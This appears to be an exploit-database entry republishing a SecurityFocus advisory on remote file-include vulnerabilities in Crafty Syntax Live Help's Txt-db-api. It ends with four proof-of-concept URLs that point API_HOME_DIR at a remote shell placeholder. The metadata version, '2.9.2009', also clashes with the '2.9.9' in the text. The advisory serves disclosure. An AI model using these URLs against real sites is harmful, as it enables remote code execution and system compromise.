Crafty Syntax Live Help Multiple Remote File-Include Vulnerabilities

vendor:

Crafty Syntax Live Help

by:

SecurityFocus

7.5

CVSS

HIGH

Remote File-Include Vulnerabilities

CWE

Product Name: Crafty Syntax Live Help

Affected Version From: 2.9.2009

Affected Version To: 2.9.2009

Patch Exists: YES

Related CWE: N/A

CPE: a:craftysyntax:crafty_syntax_live_help

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Crafty Syntax Live Help Multiple Remote File-Include Vulnerabilities

Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. Note that these issues affect only the version of Crafty Syntax Live Help that includes the Text Based Database Support package (Txt-db-api). Version 2.9.9 is vulnerable; other versions may also be affected.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20711/info

Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Note that these issues affect only the version of Crafty Syntax Live Help that includes the Text Based Database Support package (Txt-db-api).

Version 2.9.9 is vulnerable; other versions may also be affected.

http://www.example.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
http://www.example.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?